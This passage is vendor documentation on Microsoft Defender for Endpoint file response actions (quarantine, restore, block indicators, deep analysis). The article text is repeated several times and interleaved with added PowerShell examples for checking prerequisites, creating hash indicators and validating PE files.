Non-Portable Executable file (.txt, .docx, and others) - Global admin or Advanced
live response

Download quarantined files


Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
"Download file" button. This feature is turned 'On' by default.

The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP .

Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features

Backing up quarantined files

Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.

This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.

Important

Download quarantined file requirements:

Your organization uses Microsoft Defender Antivirus in active mode
Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and
engine versions
Cloud-based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, Windows 11, or Windows Server 2016,
2019, or 2022
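The prerequisites in "Stop and quarantine files in your network" (Defender Antivirus at least in passive mode) and in the "Download quarantined file requirements" list above can be verified on a device before you rely on either action. The following script is an added example, not part of the original article. It uses only the built-in Defender cmdlets (Get-MpComputerStatus and Get-MpPreference) and Win32_OperatingSystem; the engine version threshold is the 1.1.17300.4 quoted above, and the build numbers (15063 for Windows 10 version 1703, 14393 for Windows Server 2016) are the ones those releases ship with.

```powershell
# Added example (not from the article): check on one device the prerequisites the
# article lists for "Stop and Quarantine File" (Defender Antivirus at least in
# passive mode) and for "Download quarantined files" (active mode, engine
# 1.1.17300.4 or later, cloud-delivered protection, sample submission, supported OS).
# Run from an elevated PowerShell prompt.

function Test-MdeFileActionPrerequisites {
    [CmdletBinding()]
    param(
        # Minimum engine version the article quotes for downloading quarantined files.
        [version]$MinEngineVersion = '1.1.17300.4'
    )

    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    $os     = Get-CimInstance Win32_OperatingSystem

    # AMRunningMode is "Normal" when Defender Antivirus is the active AV; the passive
    # variants mean another AV product is primary but Defender still runs.
    $activeMode     = $status.AMRunningMode -eq 'Normal'
    $atLeastPassive = $status.AMRunningMode -in @('Normal', 'Passive Mode', 'SxS Passive Mode', 'EDR Block Mode')

    # MAPSReporting: 0 = cloud-delivered protection off, 1 = basic, 2 = advanced.
    $cloudOn = [int]$pref.MAPSReporting -ne 0

    # SubmitSamplesConsent: 0 = always prompt, 1 = send safe samples automatically,
    # 2 = never send, 3 = send all samples automatically. With 0, only samples the
    # user approves are collected (see "Backing up quarantined files").
    $sampleMode = switch ([int]$pref.SubmitSamplesConsent) {
        0 { 'Prompt' }
        1 { 'SafeSamples' }
        2 { 'Off' }
        3 { 'AllSamples' }
        default { 'Unknown' }
    }

    $engineOk = [version]$status.AMEngineVersion -ge $MinEngineVersion

    # Windows 10 version 1703 is build 15063; Windows Server 2016, the oldest server
    # in the download requirements, is build 14393. ProductType 1 = workstation.
    $build = [int]$os.BuildNumber
    $osOk  = if ($os.ProductType -eq 1) { $build -ge 15063 } else { $build -ge 14393 }

    [pscustomobject]@{
        ComputerName              = $env:COMPUTERNAME
        RunningMode               = $status.AMRunningMode
        EngineVersion             = $status.AMEngineVersion
        CloudProtection           = $cloudOn
        SampleSubmission          = $sampleMode
        TamperProtected           = $status.IsTamperProtected
        StopAndQuarantineEligible = $atLeastPassive
        DownloadQuarantinedReady  = $activeMode -and $engineOk -and $cloudOn -and ($sampleMode -ne 'Off') -and $osOk
    }
}

Test-MdeFileActionPrerequisites | Format-List
```

A device that reports StopAndQuarantineEligible = True but DownloadQuarantinedReady = False is the common case in environments where Defender Antivirus runs in passive mode behind a third-party product: the response action will work, but the quarantined sample will not be backed up for download and you will see Collect file instead.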

Collect files
If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.

The Collect file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection
attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

Portable Executable file (.exe, .sys, .dll, and others) - Global admin, Advanced live
response, or Alerts investigation
Non-Portable Executable file (.txt, .docx, and others) - Global admin or Advanced
live response

If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.

Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this happens after a temporary logon to a system or shared
folder whose access tokens have since expired.

Add indicator to block or allow a file
Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

Important

This feature is available if your organization uses Microsoft Defender Antivirus
and Cloud-delivered protection is enabled. For more information, see Manage
cloud-delivered protection.

The Antimalware client version must be 4.18.1901.x or later.

This feature is designed to prevent suspected malware (or potentially
malicious files) from being downloaded from the web. It currently supports
portable executable (PE) files, including .exe and .dll files. The coverage will be
extended over time.

This response action is available for devices on Windows 10, version 1703 or
later, and Windows 11.

An allow or block indicator doesn't take effect on a device where the file's
classification was already cached before the indicator was added.

Note

The PE file needs to be in the device timeline for you to be able to take this action.

There may be a couple of minutes of latency between the time the action is taken
and the actual file being blocked.

Enable the block file feature


To start blocking files, you first need to turn the Block or allow feature on in Settings.

Allow or block file


When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

See manage indicators for more details on blocking and raising alerts on files.

To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action will be visible in the same position as the Add
Indicator action, before you added the indicator.

You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.
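The steps above add a file-hash indicator through the portal. The same indicator can be created programmatically through the Defender for Endpoint Indicators API, which this article does not cover; the following script is an added example and not part of the original article. It assumes a Microsoft Entra app registration that has been granted the Ti.ReadWrite.All application permission and a bearer token for https://api.securitycenter.microsoft.com obtained separately (token acquisition is not shown); the hash in the final call is constructed and does not correspond to a real file. With -DryRun the function returns the request body without calling the service.

```powershell
# Added example (not from the article): create an "alert and block" indicator for a
# file hash through the Defender for Endpoint Indicators API (POST /api/indicators).
# Assumes an app registration with Ti.ReadWrite.All and a bearer token acquired
# elsewhere. As the article notes, the block only applies on devices running
# Defender Antivirus with cloud-delivered protection, takes a few minutes to
# propagate, and does not override a classification already cached on a device.

function New-MdeFileBlockIndicator {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Sha256,
        [Parameter(Mandatory)][string]$Title,
        [string]$Description = 'Blocked during incident response',
        [ValidateSet('Informational', 'Low', 'Medium', 'High')][string]$Severity = 'High',
        [int]$ExpirationDays = 90,
        [string]$Token,
        [switch]$DryRun
    )

    # Indicators are keyed by hash; reject anything that is not a SHA-256 hex string
    # so a typo never turns into a silently ineffective (or wrong) block.
    if ($Sha256 -notmatch '^[0-9a-fA-F]{64}$') {
        throw "Not a SHA-256 hash: $Sha256"
    }

    $body = [ordered]@{
        indicatorValue = $Sha256.ToLower()
        indicatorType  = 'FileSha256'
        action         = 'AlertAndBlock'      # block the file and raise an alert
        title          = $Title
        description    = $Description
        severity       = $Severity
        # Always set an expiry so stale blocks come up for review instead of living forever.
        expirationTime = (Get-Date).ToUniversalTime().AddDays($ExpirationDays).ToString('o')
        generateAlert  = $true
    }

    if ($DryRun) { return $body }
    if (-not $Token) { throw 'A bearer token is required unless -DryRun is used.' }

    Invoke-RestMethod -Method Post `
        -Uri 'https://api.securitycenter.microsoft.com/api/indicators' `
        -Headers @{ Authorization = "Bearer $Token" } `
        -ContentType 'application/json' `
        -Body ($body | ConvertTo-Json)
}

# Dry run with a constructed, non-existent hash: shows the payload only.
New-MdeFileBlockIndicator -Sha256 ('ab' * 32) -Title 'Example block' -DryRun
```

Removing the indicator later (the "To stop blocking a file" step above) is the corresponding DELETE on /api/indicators/{id}; keeping the id returned by the POST in your incident record makes that cleanup a one-liner.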

Check activity details in Action center


The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection


Antivirus scan
App restriction
Device isolation

All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis
Cybersecurity investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.

The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).

Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.

The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.

Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.

Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.

Learn about deep analysis in the following video:
https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?rel=0&postJsllMsg=true

Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.

Note

Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.

You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for Submit for deep analysis button to become available.

Note

Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.

Submit files for deep analysis


1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:

Alerts - select the file links from the Description or Details in the Alert Story
timeline
Devices list - select the file links from the Description or Details in the Device
in organization section
Search box - select File from the drop-down menu and enter the file name

2. In the Deep analysis tab of the file view, select Submit.

Note

Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.

Note

Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.

View deep analysis reports


View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.

You can view the comprehensive report that provides details on the following sections:

Behaviors
Observables

The details provided can help you investigate if there are indications of a potential
attack.

1. Select the file you submitted for deep analysis.

2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.

Troubleshoot deep analysis


If you come across a problem when trying to submit a file, try each of the following
troubleshooting steps.

1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).

2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.

3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.

4. If the sample collection policy isn't configured, the default behavior is to allow
sample collection. If it's configured, verify that the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
check the following registry value:

text

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the policy, or move the device to an organizational unit whose Group Policy
allows sample collection. For more information, see Configure with Group Policy.

6. If these steps don't resolve the issue, contact support.
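Steps 1 and 4 above can be automated before a submission. The extension check in step 1 is a weak test: a renamed script or a truncated download can carry an .exe extension, and a PE image can carry none, so the script below parses the DOS and PE headers instead and also records the SHA-1 and SHA-256 hashes you will need if the file later becomes an indicator. It then reads the AllowSampleCollection value from step 4. This is an added example, not part of the original article; the header offsets (e_lfanew at 0x3C, Machine at +4 and Characteristics at +22 from the PE signature, IMAGE_FILE_DLL = 0x2000) are from the PE format specification, and notepad.exe is used only as a readily available sample input.

```powershell
# Added example (not from the article): pre-flight checks before submitting a file
# for deep analysis.
#  1) Confirm the file really is a PE image by parsing its headers (the extension
#     alone is not proof) and record the hashes used for indicators.
#  2) Read the AllowSampleCollection policy value named in troubleshooting step 4.

function Test-PeFile {
    param([Parameter(Mandatory)][string]$Path)

    $bytes  = [System.IO.File]::ReadAllBytes($Path)
    $result = [ordered]@{ Path = $Path; IsPE = $false; Machine = $null; IsDll = $null }

    # DOS header: "MZ" magic at offset 0, e_lfanew (file offset of the PE header) at 0x3C.
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        return [pscustomobject]$result
    }
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    # Need the 4-byte signature plus the 20-byte COFF header to be inside the file.
    if ($peOffset -le 0 -or ($peOffset + 24) -gt $bytes.Length) {
        return [pscustomobject]$result
    }

    # PE signature "PE\0\0" (0x00004550 little-endian), then the COFF header:
    # Machine (2 bytes) at +4, Characteristics (2 bytes) at +22; IMAGE_FILE_DLL = 0x2000.
    if ([BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {
        return [pscustomobject]$result
    }
    $machine = [BitConverter]::ToUInt16($bytes, $peOffset + 4)
    $chars   = [BitConverter]::ToUInt16($bytes, $peOffset + 22)

    $result.IsPE    = $true
    $result.Machine = switch ($machine) {
        0x014C { 'x86' }
        0x8664 { 'x64' }
        0xAA64 { 'ARM64' }
        default { '0x{0:X4}' -f $machine }
    }
    $result.IsDll  = ($chars -band 0x2000) -ne 0
    $result.Sha1   = (Get-FileHash -Path $Path -Algorithm SHA1).Hash
    $result.Sha256 = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    [pscustomobject]$result
}

function Get-SampleCollectionPolicy {
    # Mirrors troubleshooting step 4: absent value = default (collection allowed).
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $val = Get-ItemProperty -Path $key -Name AllowSampleCollection -ErrorAction SilentlyContinue
    if ($null -eq $val) { return 'NotConfigured (default: sample collection allowed)' }
    switch ([int]$val.AllowSampleCollection) {
        0 { 'Blocked' }
        1 { 'Allowed' }
        default { "Unexpected value $($val.AllowSampleCollection)" }
    }
}

# Sample input: a PE that exists on every Windows install (constructed example path).
Test-PeFile -Path "$env:SystemRoot\System32\notepad.exe" | Format-List
Get-SampleCollectionPolicy
```

A file that returns IsPE = False will be rejected by deep analysis regardless of its name, which is the first thing to rule out before looking at queue latency or policy. The Machine and IsDll fields are incidental but useful when deciding which device's timeline the sample is likely to appear in.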

Related topics
Take response actions on a device
Investigate files
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Take response actions on a file
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

) Important

Some information in this article relates to prereleased product which may be


substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a


file. After taking action on files, you can check on activity details in the Action center.

Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.

Response actions run along the top of the file page, and include:

Stop and quarantine file


Manage indicator
Download file
Collect file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.

Some actions require certain permissions. The following table describes what action
certain permissions can take on portable executable (PE) and non-PE files:
ノ Expand table

Permission PE files Non-PE files

View data X X

Alerts investigation ☑ X

Live response basic X X

Live response advanced ☑ ☑

For more information on roles, see Create and manage roles for role-based access
control.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and
quarantining the file where it was observed.

) Important

You can only take this action if:

The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, and Windows Server 2012 R2+
The file does not belong to trusted third-party publishers or is not signed by
Microsoft
Microsoft Defender Antivirus must at least be running on Passive mode. For
more information, see Microsoft Defender Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.

This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.

7 Note

You'll be able to restore the file from quarantine at any time.


Stop and quarantine files
1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:

Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name

7 Note

The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.

2. Go to the top bar and select Stop and Quarantine File.

3. Specify a reason, then select Confirm.


The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Success - Shows the number of devices where the file has been stopped and
quarantined.
Failed - Shows the number of devices where the action failed and details
about the failure.
Pending - Shows the number of devices where the file is yet to be stopped
and quarantined from. This can take time for cases when the device is offline
or not connected to the network.

4. Select any of the status indicators to view more information about the action. For
example, select Failed to see where the action failed.

Notification on device user

When the file is being removed from a device, the following notification is shown:

In the device timeline, a new event is added for each device where a file was stopped
and quarantined.

A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

Restore file from quarantine


You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open an elevated command-line prompt on the device:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

dos

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name


EUS:Win32/CustomEnterpriseBlock -All
7 Note

In some scenarios, the ThreatName may appear as:


EUS:Win32/CustomEnterpriseBlock!cl.

Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.

) Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.

Download or collect file


Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.

By default, you should be able to download files that are in quarantine.

The Download file button can have the following states:

Active - You'll be able to collect the file.

Disabled - If the button is grayed out or disabled during an active collection


attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Microsoft Defender XDR Unified role-based access control (RBAC):


Add file collection permission in Microsoft Defender XDR Unified (RBAC)

For Microsoft Defender for Endpoint role-based access control (RBAC):

For Portable Executable file (.exe, .sys, .dll, and others)


Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)


Global admin or Advanced live response
Tenants with role-based access (RBAC) permissions enabled

Download quarantined files


Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
"Download file" button. This feature is turned 'On' by default.

The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP .

Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features

Backing up quarantined files

Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.

This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.

) Important
Download quarantined file requirements:

Your organization uses Microsoft Defender Antivirus in active mode


Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and
engine versions
Cloud–based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, or Windows server 2016 or
2019, or Windows Server 2022, or Windows 11

Collect files
If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.

The Collect file button can have the following states:

Active - You'll be able to collect the file.

Disabled - If the button is grayed out or disabled during an active collection


attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Portable Executable file (.exe, .sys, .dll, and others)


Global admin or Advanced live response or Alerts

Non-Portable Executable file (.txt, .docx, and others)


Global admin or Advanced live response

If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.

) Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.
Add indicator to block or allow a file
Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

) Important

This feature is available if your organization uses Microsoft Defender Antivirus


and Cloud-delivered protection is enabled. For more information, see Manage
cloud-delivered protection.

The Antimalware client version must be 4.18.1901.x or later.

This feature is designed to prevent suspected malware (or potentially


malicious files) from being downloaded from the web. It currently supports
portable executable (PE) files, including .exe and .dll files. The coverage will be
extended over time.

This response action is available for devices on Windows 10, version 1703 or
later, and Windows 11.

The allow or block function cannot be done on files if the file's classification
exists on the device's cache prior to the allow or block action.

7 Note

The PE file needs to be in the device timeline for you to be able to take this action.

There may be a couple of minutes of latency between the time the action is taken
and the actual file being blocked.

Enable the block file feature


To start blocking files, you first need to turn the Block or allow feature on in Settings.

Allow or block file


When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

See manage indicators for more details on blocking and raising alerts on files.

To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action will be visible in the same position as the Add
Indicator action, before you added the indicator.

You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.

Check activity details in Action center


The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection


Antivirus scan
App restriction
Device isolation

All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.

The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).

Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.

The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.

Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.
Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.

Learn about deep analysis in the following video:


https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?
rel=0&postJsllMsg=true

Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.

7 Note

Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.

You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for Submit for deep analysis button to become available.

7 Note

Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.

Submit files for deep analysis


1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:

Alerts - select the file links from the Description or Details in the Alert Story
timeline
Devices list - select the file links from the Description or Details in the Device
in organization section
Search box - select File from the drop-down menu and enter the file name

2. In the Deep analysis tab of the file view, select Submit.

7 Note

Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.

7 Note

Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.

View deep analysis reports


View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.

You can view the comprehensive report that provides details on the following sections:

Behaviors
Observables

The details provided can help you investigate if there are indications of a potential
attack.

1. Select the file you submitted for deep analysis.

2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.

Troubleshoot deep analysis


If you come across a problem when trying to submit a file, try each of the following
troubleshooting steps.

1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).

2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.

3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.

4. If the sample collection policy isn't configured, then the default behavior is to allow
sample collection. If it's configured, then verify the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
then check the following registry value:

text

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information,
see Configure with Group Policy.

6. If these steps don't resolve the issue, contact support.

Related topics
Take response actions on a device
Investigate files
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Take response actions on a file
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a
file. After taking action on files, you can check on activity details in the Action center.

Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.

Response actions run along the top of the file page, and include:

Stop and quarantine file
Manage indicator
Download file
Collect file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.

Some actions require certain permissions. The following table describes what action
certain permissions can take on portable executable (PE) and non-PE files:
Permission               PE files   Non-PE files
View data                X          X
Alerts investigation     ☑          X
Live response basic      X          X
Live response advanced   ☑          ☑

For more information on roles, see Create and manage roles for role-based access
control.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and
quarantining the file where it was observed.

Important

You can only take this action if:

The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, or Windows Server 2012 R2+
The file does not belong to trusted third-party publishers and is not signed by
Microsoft
Microsoft Defender Antivirus is running in at least Passive mode. For
more information, see Microsoft Defender Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.

This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.

Note

You'll be able to restore the file from quarantine at any time.

Stop and quarantine files

1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:

Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name

Note

The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.

2. Go to the top bar and select Stop and Quarantine File.

3. Specify a reason, then select Confirm.


The Action center shows the submission information:

Submission time - Shows when the action was submitted.
Success - Shows the number of devices where the file has been stopped and
quarantined.
Failed - Shows the number of devices where the action failed and details
about the failure.
Pending - Shows the number of devices where the file is yet to be stopped
and quarantined. This can take time for cases when the device is offline
or not connected to the network.

4. Select any of the status indicators to view more information about the action. For
example, select Failed to see where the action failed.

Notification on device user

When the file is being removed from a device, the following notification is shown:

In the device timeline, a new event is added for each device where a file was stopped
and quarantined.

A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

Restore file from quarantine


You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open an elevated command-line prompt on the device:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

dos

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

Note

In some scenarios, the ThreatName may appear as:
EUS:Win32/CustomEnterpriseBlock!cl.

Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.

Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.
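As an added example that is not part of the Microsoft article, the following PowerShell script wraps the restore step above: it lists the device's quarantine with MpCmdRun's documented -Restore -ListAll switch, checks for both threat-name forms the note mentions, and runs the restore for each one that is present. It assumes the default Microsoft Defender Antivirus install path and an elevated session on the device.

```powershell
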